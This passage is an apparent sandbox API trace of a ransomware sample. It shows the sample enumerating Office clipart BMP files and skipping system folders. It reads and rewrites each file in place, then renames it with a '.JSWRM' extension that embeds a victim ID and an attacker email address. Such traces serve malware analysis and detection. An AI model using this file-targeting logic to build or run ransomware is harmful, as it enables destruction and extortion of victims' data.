hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0094.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.136] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02071U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02071u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0094.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0094.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0094.137] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02074U.BMP", cAlternateFileName="")) returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2=".") returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="..") returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="...") returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="windows") returned -1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="recovery") returned -1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="perflogs") returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="documents and settings") returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="system volume information") returned -1 [0094.137] lstrcmpiW (lpString1="PH02074U.BMP", lpString2="msocache") returned 1 [0094.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0094.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02074U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02074U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02074U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0094.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0094.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02074U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02074U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02074U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0094.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0094.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0094.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0094.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.138] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0094.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0094.139] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.142] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.143] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.144] CloseHandle (hObject=0x314) returned 1 [0094.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0094.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0094.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0094.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0094.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0094.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.144] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02074U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02074u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0094.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0094.145] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02208U.BMP", cAlternateFileName="")) returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2=".") returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="..") returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="...") returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="windows") returned -1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="recovery") returned -1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="perflogs") returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="documents and settings") returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="system volume information") returned -1 [0094.145] lstrcmpiW (lpString1="PH02208U.BMP", lpString2="msocache") returned 1 [0094.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0094.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02208U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02208U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02208U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0094.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02208U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02208U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02208U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0094.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0094.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.146] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0094.146] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0094.147] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.150] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.150] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0094.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.151] CloseHandle (hObject=0x314) returned 1 [0094.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0094.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0094.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0094.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0094.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0094.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0094.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0094.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0094.152] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02208U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02208u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0094.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0094.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0094.153] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02223U.BMP", cAlternateFileName="")) returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2=".") returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="..") returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="...") returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="windows") returned -1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="recovery") returned -1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="perflogs") returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="documents and settings") returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="system volume information") returned -1 [0094.153] lstrcmpiW (lpString1="PH02223U.BMP", lpString2="msocache") returned 1 [0094.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0094.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02223U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02223U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02223U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0094.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0094.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02223U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02223U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02223U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0094.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0094.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.154] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0094.154] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0094.155] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0094.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.196] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0094.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.197] CloseHandle (hObject=0x314) returned 1 [0094.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0094.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0094.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0094.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0094.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0094.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0094.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02223U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02223u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0094.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0094.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0094.199] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02291U.BMP", cAlternateFileName="")) returned 1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2=".") returned 1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="..") returned 1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="...") returned 1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="windows") returned -1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="recovery") returned -1 [0094.199] lstrcmpiW (lpString1="PH02291U.BMP", lpString2="perflogs") returned 1 [0094.199] lstrcmpiW 